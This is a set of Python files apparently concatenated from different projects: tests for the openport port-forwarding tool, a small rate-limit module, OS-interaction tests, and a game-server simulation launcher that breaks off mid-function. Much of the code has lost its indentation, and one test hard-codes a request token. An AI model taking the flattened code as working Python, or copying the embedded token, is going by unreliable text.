# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# p_manager = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(manager_port), '--server', TEST_SERVER],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager)
#
# sleep(1)
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertTrue(openportmanager.manager_is_running(manager_port))
#
# # Starting http server
#
# port = self.osinteraction.get_open_port()
# print 'local port: ', port
#
# s = TestHTTPServer(port)
# s.reply('echo')
# s.runThreaded()
#
# # Starting openport session
#
# p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
# '--verbose', '--server', TEST_SERVER, '--manager-port', str(manager_port),
# '--http-forward', '--database', self.db_file, '--restart-on-reboot'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_app)
# print "p_app pid:", p_app.pid
# sleep(10)
#
# # Checking that everything is still running.
#
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertEqual(1, self.get_share_count_of_manager(manager_port))
# process_output = print_all_output(p_app, self.osinteraction, 'p_app')
#
# remote_host = self.getRemoteAddress(process_output[0])
# sleep(10)
#
# # Checking the connection.
#
# cr = SimpleHTTPClient()
# try:
# url = 'http://' + remote_host
# print 'url=' + url
# self.assertEqual('echo', cr.get(url))
# except Exception as e:
# tr = traceback.format_exc()
# logger.error(e)
# logger.error(tr)
# self.fail('first port forwarding failed')
#
# # Killing the manager
#
# if not osinteraction.is_windows():
# self.osinteraction.kill_pid(p_manager.pid, signal.SIGINT)
# else:
# self.kill_manager(manager_port)
# sleep(3)
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# # Checking that the connection is down.
#
# try:
# self.assertEqual('echo', cr.get(url, print500=False))
# self.fail('expecting an exception')
# except AssertionError:
# raise
# except:
# pass
#
# if not osinteraction.is_windows():
# run_method_with_timeout(p_app.communicate, 2, raise_exception=False)
#
# self.assertFalse(self.osinteraction.pid_is_running(p_app.pid))
#
# # Restarting manager, should restart port-forwarding app
#
# p_manager = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', 'manager', '--database', self.db_file,
# '--verbose', '--manager-port', str(manager_port), '--server', TEST_SERVER,
# '--restart-shares'],
# stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# self.processes_to_kill.append(p_manager)
#
# sleep(25)
# process_output = print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertTrue(openportmanager.manager_is_running(manager_port))
# self.assertEqual(1, self.get_share_count_of_manager(manager_port))
#
# # Checking that http server is still running
#
# local_url = 'http://127.0.0.1:%s' % port
# try:
# self.assertEqual('echo', cr.get(local_url))
# except Exception as e:
# logger.exception(e)
# self.fail('calling local port failed')
#
# print "url2: %s" % url
# wait_for_success_callback(p_manager, self.osinteraction, output_prefix='p_manager')
#
# # Checking that the openport session has restarted.
#
# try:
# self.assertEqual('echo', cr.get(url, print500=False))
# except Exception as e:
# logger.exception(e)
# self.fail('second port forwarding failed')
#
# # Killing the manager should also kill the app
#
# if not osinteraction.is_windows():
# self.osinteraction.kill_pid(p_manager.pid, signal.SIGINT)
# else:
# self.kill_manager(manager_port)
#
# sleep(3)
#
# print_all_output(p_manager, self.osinteraction, 'p_manager')
#
# self.assertFalse(openportmanager.manager_is_running(manager_port))
#
# # Checking that the openport session has ended.
#
# try:
# self.assertEqual('echo', cr.get(url, print500=False))
# self.fail('expecting an exception')
# except:
# pass
def check_http_port_forward(self, remote_host, local_port, remote_port=80):
s = TestHTTPServer(local_port)
response = 'echo'
s.reply(response)
s.runThreaded()
c = SimpleHTTPClient()
actual_response = c.get('http://localhost:%s' % local_port)
self.assertEqual(actual_response, response.strip())
url = 'http://%s:%s' % (remote_host, remote_port) if remote_port != 80 else 'http://%s' % remote_host
print('checking url:{}'.format(url))
try:
actual_response = c.get(url)
        except urllib2.URLError as e:
            self.fail('Http forward failed: %s' % e)
self.assertEqual(actual_response, response.strip())
print('http portforward ok')
s.server.shutdown()
def kill_manager(self, manager_port):
url = 'http://localhost:%s/exit' % manager_port
logger.debug('sending get request ' + url)
try:
req = urllib2.Request(url)
response = urllib2.urlopen(req, timeout=1).read()
if response.strip() != 'ok':
print (lineNumber(), response)
else:
print ('manager killed')
except Exception as detail:
print (detail)
def get_share_count_of_manager(self, manager_port):
url = 'http://localhost:%s/active_count' % manager_port
logger.debug('sending get request ' + url)
try:
req = urllib2.Request(url)
response = urllib2.urlopen(req, timeout=1).read()
return int(response)
except Exception as detail:
print ('error contacting the manager: %s %s' % (url, detail))
raise
def test_kill_openport_app(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--verbose', '--local-port', '%s' % port,
'--server', TEST_SERVER,
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
sleep(2)
get_remote_host_and_port(p, self.osinteraction)
print('pid: %s' % p.pid)
self.osinteraction.kill_pid(p.pid, signal.SIGTERM)
run_method_with_timeout(p.wait, 10)
output = self.osinteraction.get_output(p)
print(output[0])
print(output[1])
# Sadly, this does not work on windows...
if not osinteraction.is_windows():
self.assertTrue('got signal ' in output[0])
self.assertFalse(self.osinteraction.pid_is_running(p.pid))
def test_remote_kill_stops_application(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
session = self.db_handler.get_share_by_local_port(port)
data = {'port': session.server_port, 'session_token': session.server_session_token, }
print(data)
r = requests.post('{}/api/v1/kill-session'.format(TEST_SERVER),
data)
logger.debug('#########{}'.format(r.text))
self.assertEqual(200, r.status_code, r.text)
self.osinteraction.print_output_continuously_threaded(p, 'p')
run_method_with_timeout(p.wait, 30)
self.assertFalse(self.osinteraction.pid_is_running(p.pid))
def test_version(self):
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--version'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
run_method_with_timeout(p.wait, 10)
process_output = p.communicate()
for out in process_output:
print ('output: ', out)
self.assertFalse(self.application_is_alive(p))
self.assertEqual(openport_app_version.VERSION, process_output[1].strip())
def test_run_run_command_with_timeout(self):
self.assertEqual((False, False),
run_command_with_timeout([PYTHON_EXE, '-c', 'from time import sleep;sleep(1)'], 2))
self.assertEqual((False, False),
run_command_with_timeout([PYTHON_EXE, '-c', 'from time import sleep;sleep(2)'], 1))
self.assertEqual(('hello', False), run_command_with_timeout([PYTHON_EXE, '-c', "print 'hello'"], 1))
self.assertEqual(('hello', False), run_command_with_timeout([PYTHON_EXE, '-c', 'from time import sleep;import sys'
";print 'hello';sys.stdout.flush()"
';sleep(2)'], 1))
def test_shell_behaviour(self):
p = subprocess.Popen('''%s -c "print 'hello'"''' % PYTHON_EXE, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertEqual(('hello', False), self.osinteraction.get_output(p))
p = subprocess.Popen([PYTHON_EXE, '-c', 'print "hello"'], shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertEqual(('hello', False), self.osinteraction.get_output(p))
def test_open_for_ip_option__False(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--verbose', '--local-port', '%s' % port,
'--server', TEST_SERVER,
'--database', self.db_file, '--ip-link-protection', 'False'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
self.check_application_is_still_alive(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
check_tcp_port_forward(self, remote_host, port, remote_port)
def test_open_for_ip_option__True(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--verbose', '--local-port', '%s' % port,
'--server', TEST_SERVER,
'--database', self.db_file, '--ip-link-protection', 'True'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
self.check_application_is_still_alive(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.assertFalse(check_tcp_port_forward(self, remote_host, port, remote_port, fail_on_error=False))
click_open_for_ip_link(link)
check_tcp_port_forward(self, remote_host, port, remote_port)
def test_alembic__0_9_1__new_share(self):
old_db = os.path.join(os.path.dirname(__file__), 'testfiles/openport-0.9.1.db')
old_db_tmp = os.path.join(os.path.dirname(__file__), 'testfiles/tmp/openport-0.9.1.db')
shutil.copy(old_db, old_db_tmp)
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', old_db_tmp],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
db_handler = dbhandler.DBHandler(old_db_tmp)
session_from_db = db_handler.get_share_by_local_port(port)
self.assertNotEqual(session_from_db, None)
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port)
def test_alembic__0_9_1__restart_shares(self):
pass
def test_alembic__create_migrations(self):
return
old_db = os.path.join(os.path.dirname(__file__), 'testfiles/openport-0.9.1.db')
old_db_tmp = os.path.join(os.path.dirname(__file__), 'testfiles/tmp/openport-0.9.1.db')
shutil.copy(old_db, old_db_tmp)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--create-migrations', '--verbose', '--database', old_db_tmp],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
run_method_with_timeout(p.wait, 10)
process_output = print_all_output(p, self.osinteraction, 'list')
print (process_output[0])
self.assertFalse(process_output[1])
def test_openport_app__no_errors(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
get_remote_host_and_port(p, self.osinteraction)
output = print_all_output(p, self.osinteraction)
self.assertFalse(output[1])
# self.assertFalse('UserWarning' in output[1])
p.kill()
def test_openport_app__restart_on_reboot_app_not_running(self):
port = self.osinteraction.get_open_port()
# This app should be restarted
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--restart-on-reboot', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
get_remote_host_and_port(p, self.osinteraction)
p.kill()
# This app shouldn't be restarted
q = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(q)
remote_host, remote_port, link = get_remote_host_and_port(q, self.osinteraction)
output = self.osinteraction.get_all_output(q)
self.assertTrue('Port forward for port %s that would be restarted on reboot will not be restarted anymore.' % port in output[0])
def test_hang(self):
sleep_and_print = '''from time import sleep
for i in range(%s):
print i
sleep(1)
print 'Now forwarding remote port test.openport.be:12345 to localhost:555'
print 'to first go here: http://1235.be .'
print 'INFO - You are now connected. You can access the remote pc\\\'s port 7777 on localhost:8888'
for i in range(%s):
print i
sleep(1)
'''
port_out = self.osinteraction.get_open_port()
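        # NOTE: the `if 1 == 1:` blocks below act as manual debug switches: flipping them swaps the
        # real openport processes for the sleep_and_print dummy so the hang can be reproduced in isolation.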
if 1 == 1:
p_out = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
else:
p_out = subprocess.Popen([PYTHON_EXE, '-c', sleep_and_print % (3, 60)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_out.pid: %s' % p_out.pid)
self.processes_to_kill.append(p_out)
remote_host, remote_port, link = get_remote_host_and_port(p_out, self.osinteraction)
# click_open_for_ip_link(link)
self.osinteraction.print_output_continuously_threaded(p_out, 'p_out')
sleep(1)
logger.debug(self.osinteraction.get_output(p_out))
if 1 == 1:
if 1 == 1:
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py',
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port), '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
else:
port_out = self.osinteraction.get_open_port()
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction)
else:
p_in = subprocess.Popen([PYTHON_EXE, '-c', sleep_and_print % (3, 60)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
logger.debug('p_in.pid: %s' % p_in.pid)
self.processes_to_kill.append(p_in)
self.check_application_is_still_alive(p_in)
self.check_application_is_still_alive(p_out)
sleep(1)
logger.debug(self.osinteraction.get_output(p_in))
# sleep(2)
# in_session = self.db_handler.get_share_by_local_port(port_in, filter_active=False)
# check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
p_in.terminate()
logger.debug('p_in wait')
run_method_with_timeout(p_in.wait, 10)
logger.debug('p_in wait done')
if 1 == 1:
p_restart = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--restart-shares', '--verbose',
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
else:
p_restart = subprocess.Popen([PYTHON_EXE, '-c', sleep_and_print % (1, 3)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_restart started')
self.processes_to_kill.append(p_restart)
logger.debug('p_restart continuous print')
self.osinteraction.print_output_continuously_threaded(p_restart, 'p_restart')
logger.debug('p_restart.wait')
#run_method_with_timeout(p_restart.wait, 10)
# p_restart.communicate()
logger.debug('p_restart.pid: %s' % p_restart.pid)
run_method_with_timeout(p_restart.wait, 10)
# p_restart.wait()
logger.debug('p_restart.wait done')
self.check_application_is_still_alive(p_out)
logger.debug('alive!')
# check_tcp_port_forward(self, remote_host=remote_host, local_port=port_out, remote_port=remote_port)
def foo():
return False
logger.debug('wait for response')
# wait_for_response(foo, timeout=5)
logger.debug('sleeping now')
sleep(1)
#sleep(20)
logger.debug('wait_for_response done')
# check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
def test_list(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
session = self.db_handler.get_share_by_local_port(port)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--list', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
p.wait()
output = p.communicate()
for i in output:
print (i)
self.assertTrue(session.open_port_for_ip_link in output[0])
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test-reports'))
|
withdraw.py
|
import queue
import threading
import time
rateLimit = []
rateLimitQueue = queue.Queue()
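# rateLimit holds the users that are currently rate limited; rateLimitQueue holds matching
# (user, expiry_timestamp) pairs in the same order, consumed by the cleanup thread below.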
def cooldown_add(user, cooldown_amount=86400):
rateLimitQueue.put((user, time.time()+cooldown_amount))
rateLimit.append(user)
def deleteLimit():
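    # Background worker: waits until the oldest cooldown has expired, then removes that user
    # from the front of rateLimit. Started once at import time on the thread below.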
while True:
        if rateLimitQueue.empty():
time.sleep(1)
else:
latest = rateLimitQueue.get()
current = round(time.time())
expires = latest[1]
if current >= expires:
rateLimit.pop(0)
continue
else:
time.sleep(expires-current)
rateLimit.pop(0)
rateLimitThread = threading.Thread(target=deleteLimit)
rateLimitThread.start()
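
# Illustrative usage sketch (assumption: this module is run directly; only the names defined above are used).
# cooldown_add() puts a user on the rate limit list for cooldown_amount seconds; the background
# thread removes the user again once that cooldown has expired. Note that the cleanup thread is
# not a daemon, so the process keeps running after the prints below.
if __name__ == '__main__':
    cooldown_add('alice', cooldown_amount=2)
    print('alice' in rateLimit)   # True right after adding
    time.sleep(3)
    print('alice' in rateLimit)   # False once the cooldown has expired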
|
os_interaction_tests.py
|
__author__ = 'jan'
import os
import sys
import logging
import threading
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import unittest
import xmlrunner
from services.osinteraction import OsInteraction, getInstance, is_windows
import subprocess
from time import sleep
from services.logger_service import set_log_level
from test_utils import run_command_with_timeout, run_command_with_timeout_return_process
from services.utils import run_method_with_timeout
from common.share import Share
from mock import Mock, call
import pyperclip
class OsInteractionTest(unittest.TestCase):
def setUp(self):
print self._testMethodName
self.os_interaction = getInstance()
set_log_level(logging.DEBUG)
def test_set_variable(self):
args = ['python', 'openport.py', '--one', '--two', '--three', '3']
self.assertEqual(['python', 'openport.py', '--one', '--two'], OsInteraction.unset_variable(args, '--three'))
self.assertEqual(['python', 'openport.py', '--one', '--three', '3'], OsInteraction.unset_variable(args, '--two'))
self.assertEqual(['python', 'openport.py', '--one', '--two', '--three', '3', '--four', '4'],
OsInteraction.set_variable(args, '--four', '4'))
self.assertEqual(['python', 'openport.py', '--one', '--two', '--three', '3', '--four'],
OsInteraction.set_variable(args, '--four'))
self.assertEqual(['python', 'openport.py', '--one', '--two', '--three', '3', '--four', 'False'],
OsInteraction.set_variable(args, '--four', False))
self.assertEqual(args, OsInteraction.unset_variable(args, '--not-there'))
def test_get_variable(self):
self.assertEqual('jan', OsInteraction.get_variable(['sudo', '-u', 'jan', 'ls', 'test'], '-u'))
self.assertEqual(None, OsInteraction.get_variable(['ls', 'test'], '-u'))
self.assertEqual('jan', OsInteraction.get_variable(['sudo', '-u', 'jan', 'ls', '-u', 'test'], '-u'))
self.assertEqual('jan', OsInteraction.get_variable(['sudo', '-u', 'jan'], '-u'))
self.assertEqual(None, OsInteraction.get_variable(['ls', '-u'], '-u'))
def test_non_block_read(self):
# The flush is needed for the tests.
# See http://stackoverflow.com/questions/6257800/incremental-output-with-subprocess-pipe
p = subprocess.Popen(['python', '-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(1); print 'bbb'"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
bufsize=1, close_fds=not is_windows())
sleep(0.1)
self.assertEqual(('aaa', False), self.os_interaction.non_block_read(p))
sleep(2)
self.assertEqual(('bbb', False), self.os_interaction.non_block_read(p))
#todo: close_fds = ON_POSIX ?
self.assertEqual(('aaa%sbbb' % os.linesep, False), self.os_interaction.get_all_output(p))
def test_non_block_read__no_output(self):
# The flush is needed for the tests.
# See http://stackoverflow.com/questions/6257800/incremental-output-with-subprocess-pipe
p = subprocess.Popen(['python', '-c', "from time import sleep;import sys; "
"sleep(1); print 'bbb'"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
bufsize=1, close_fds=not is_windows())
sleep(0.1)
self.assertEqual((False, False), self.os_interaction.non_block_read(p))
self.assertEqual((False, False), self.os_interaction.get_all_output(p))
sleep(2)
self.assertEqual(('bbb', False), self.os_interaction.non_block_read(p))
self.assertEqual(('bbb', False), self.os_interaction.get_all_output(p))
def test_run_command_and_print_output_continuously(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(1); print 'bbb'"])
output, p = self.os_interaction.run_command_and_print_output_continuously(command)
self.assertEqual(['aaa%sbbb' % os.linesep, False], output)
def test_run_command_and_print_output_continuously__kill_app(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(5); print 'bbb'"])
s = run_command_with_timeout_return_process(command, 1)
sleep(1.5)
output = self.os_interaction.print_output_continuously(s)
self.assertEqual(['aaa', False], output)
def test_get_output__kill_app(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "from time import sleep;import sys; print 'aaa'; sys.stdout.flush(); "
"sleep(3); print 'bbb'"])
output = run_command_with_timeout(command, 1)
self.assertEqual(('aaa', False), output)
def test_get_output__simple(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "print 'hello'"])
output = run_command_with_timeout(command, 1)
self.assertEqual(('hello', False), output)
def test_get_output__stderr(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
command.extend(['-c', "import sys; sys.stderr.write('hello_err')"])
output = run_command_with_timeout(command, 1)
self.assertEqual((False, 'hello_err'), output)
def test_pid_is_running(self):
command = self.os_interaction.get_python_exec()
command.extend(['-c', "print 'hello'"])
process = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE,
shell=is_windows(),
close_fds=not is_windows())
process.wait()
self.assertFalse(self.os_interaction.pid_is_running(process.pid))
command = self.os_interaction.get_python_exec()
command.extend(['-c', "from time import sleep;sleep(1); print 'hello'"])
process = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE,
shell=is_windows(),
close_fds=not is_windows())
self.assertTrue(self.os_interaction.pid_is_running(process.pid))
def test_pid_is_openport_process(self):
port = self.os_interaction.get_open_port()
os.chdir(os.path.dirname(os.path.dirname(__file__)))
python_exe = self.os_interaction.get_python_exec()
p = subprocess.Popen(python_exe + ['apps/openport_app.py', '--local-port', '%s' % port,
'--server', 'http://test.openport.be', '--verbose'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
try:
self.assertTrue(self.os_interaction.pid_is_openport_process(p.pid))
finally:
p.kill()
def test_start_openport_process(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = ['sudo', '-u', 'pi', '/usr/bin/openport', '2025', '--restart-on-reboot', '--request-port', '31261',
'--request-token', 'WkSXfYyksNy4vN2h', '--start-manager', 'False']
share = Share()
share.restart_command = command
method = self.os_interaction.start_process
self.os_interaction.start_process = Mock(return_value='')
try:
self.os_interaction.start_openport_process(share)
self.os_interaction.start_process.assert_has_calls(
[call(['env/bin/python', 'apps/openport_app.py', '2025', '--restart-on-reboot', '--request-port',
'31261', '--request-token', 'WkSXfYyksNy4vN2h', '--start-manager', 'False'])])
finally:
self.os_interaction.start_process = method
def test_kill_pid(self):
if not is_windows():
return
os.chdir(os.path.dirname(os.path.dirname(__file__)))
python_exe = self.os_interaction.get_python_exec()
p = subprocess.Popen(python_exe + ['tryouts/signal_test.py'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
sleep(1)
self.os_interaction.kill_pid(p.pid)
run_method_with_timeout(p.wait, 2)
self.assertNotEqual(None, p.poll())
        output = self.os_interaction.get_output(p)
print output[0]
print output[1]
if not is_windows():
self.assertTrue(output[0] and 'got signal' in output[0])
def test_run_function_with_lock(self):
x = [0]
def add_one():
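            # Deliberate non-atomic read/sleep/write: without run_function_with_lock serialising
            # these calls, concurrent threads would read the same value and lose increments.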
a = x[0]
sleep(0.001)
x[0] = a + 1
threads = []
        thread_amount = 10  # Setting this number too high will fail the tests because the system cannot create that many lock files
for i in range(thread_amount):
t = threading.Thread(target=lambda: self.os_interaction.run_function_with_lock(add_one, 'add_one'))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
self.assertEqual(x[0], thread_amount)
def test_copy_to_clipboard(self):
text1 = 'hallo'
self.os_interaction.copy_to_clipboard(text1)
self.assertEqual(text1, pyperclip.paste())
text2 = 'daag'
self.os_interaction.copy_to_clipboard(text2)
self.assertEqual(text2, pyperclip.paste())
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test-reports'))
|
simulation.py
|
import argparse
import emulation.GTAEventsReader
import time
import os
import subprocess
import sys
from threading import Thread
from threading import Lock
from decimal import Decimal
from common.constants import init_logger
import logging
SLAVE_NODE_SERVER_NAME_PREFIX = "slave_"
MASTER_NODE_SERVER_NAME = "master_node"
MASTER_SERVER = " 0"
SIMULATION_SERVERS_WARMUP_TIME = 3
logger = logging.getLogger("sys." + __name__.split(".")[-1])
LOCATION_CLIENT_APP_WINDOWS = '..\\client\\app.py'
LOCATION_CLIENT_APP_LINUX = '../client/app.py'
LOCATION_SERVER_APP_WINDOWS = '..\\server\\app.py'
LOCATION_SERVER_APP_LINUX = '../server/app.py'
# This method adds a client to the simulation.
# Input: lock: lock object for concurrency control,
# event_details: the details related to the connection of the client to the simulation.
# adjTimestamp: an adjustment on the timestamp to discount the time that took for the event to be triggered.
# Output: none.
def addClient(lock, event_details, clientApp, adjTimestamp):
    # If the elapsed delay is already longer than the timestamp at which the event should be triggered,
    # the sleep is skipped and the event is triggered immediately.
if event_details.timeStamp - Decimal(adjTimestamp) > 0:
time.sleep(event_details.timeStamp - Decimal(adjTimestamp))
# command line to start the client application: python ../client/app.py --log-prefix player_id
proc = subprocess.Popen([sys.executable, "-m", "client.app", '--log-prefix', event_details.playerId, '--config','./test/das_config.json'])
logger.debug("This is the playerId: " + event_details.playerId + " and this is the PID:" + str(proc.pid))
with lock:
playersAndProcesses[event_details.playerId] = proc.pid
logger.info("Player: " + event_details.playerId + " joining the game.")
return
# This method removes a client from the simulation.
# Input: lock: lock object for concurrency control,
# event_details: the details related to the connection of the client to the simulation.
# adjTimestamp: an adjustment on the timestamp to discount the time that took for the event to be triggered.
# isWindows: if the current execution is on Windows.
# Output: none.
def removeClient(lock, event_details, isWindows, adjTimestamp):
with lock:
numberOfPlayers = len(playersAndProcesses)
if numberOfPlayers > 0:
if event_details.timeStamp - Decimal(adjTimestamp) > 0:
time.sleep(event_details.timeStamp - Decimal(adjTimestamp))
if not isWindows:
commandLine = "kill -9 " + str(playersAndProcesses[event_details.playerId])
else:
#Killing the process using a Windows command
commandLine = "taskkill /f /pid " + str(playersAndProcesses[event_details.playerId])
# Executing the command to kill the respective process.
os.system(commandLine)
with lock:
            playersAndProcesses[event_details.playerId] = None
            # Entries are set to None on logout, so only count players whose process is still active.
            numberOfPlayers = len([pid for pid in playersAndProcesses.values() if pid is not None])
logger.info("Player: " + event_details.playerId + " leaving the game.")
else:
logger.info("This player currently doesn't have an active session, so no Logout action will be performed.")
return
if numberOfPlayers == 0:
logger.info("This was the last player to leave the game, end of simulation.")
def triggerJoinLeaveEvents(listOfEventsToTrigger, lock, clientApp, delayBetweenEvents):
listOfThreads = []
adjustmentTimestamp = 0
for event in listOfEventsToTrigger:
if event.eventType == emulation.GTAEventsReader.PLAYER_LOGIN:
thread = Thread(target=addClient, args=(lock, event, clientApp, adjustmentTimestamp,))
thread.start()
listOfThreads.append(thread)
else:
if event.eventType == emulation.GTAEventsReader.PLAYER_LOGOUT:
thread = Thread(target=removeClient, args=(lock, event, runningWindows, adjustmentTimestamp,))
thread.start()
listOfThreads.append(thread)
#Assuming that the time between events is respected also for Login/logout
time.sleep(delayBetweenEvents)
adjustmentTimestamp += delayBetweenEvents
# Waits for all threads to finish
for single_thread in listOfThreads:
single_thread.join()
def addServer(event_details, serverApp, configFile, serverName, target_port, is_master):
time.sleep(event_details.timeStamp)
# Starting the server
# command line to start the base server: python ../server/app.py --log-prefix player_id
if is_master:
proc = subprocess.Popen([sys.executable, "-m", "server.app" ,'--users', 'test/das_map.json' , '--config', configFile, '--log-prefix', serverName, '--port', str(target_port)])
else:
proc = subprocess.Popen([sys.executable, "-m", "server.app" , '--config', configFile, '--log-prefix', serverName, '--port', str(target_port)])
if proc.pid > 0:
logger.info("Server" + serverName + "successfully added. Process Id: " + str(proc.pid))
serverProcesses[serverName] = proc.pid
else:
logger.error("Error while loading the base server. Simulation will be aborted.")
return
if MASTER_NODE_SERVER_NAME == serverName:
time.sleep(SIMULATION_SERVERS_WARMUP_TIME)
def triggerServerEvents(serverApp, configFile, base_port, port_offset, numSlaveServers, listOfServerEvents):
    # A provided list of server events takes precedence over the numSlaveServers parameter.
if (listOfServerEvents is not None):
for event in listOfServerEvents:
if event.eventType == emulation.GTAEventsReader.SERVER_ADD:
if event.playerId == MASTER_SERVER:
thread = Thread(target=addServer, args=(event, serverApp,configFile,MASTER_NODE_SERVER_NAME, base_port, True))
else:
slave_port = base_port + port_offset * int(event.playerId)
thread = Thread(target=addServer, args=(event, serverApp, configFile, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip(), str(slave_port), False))
thread.start()
else:
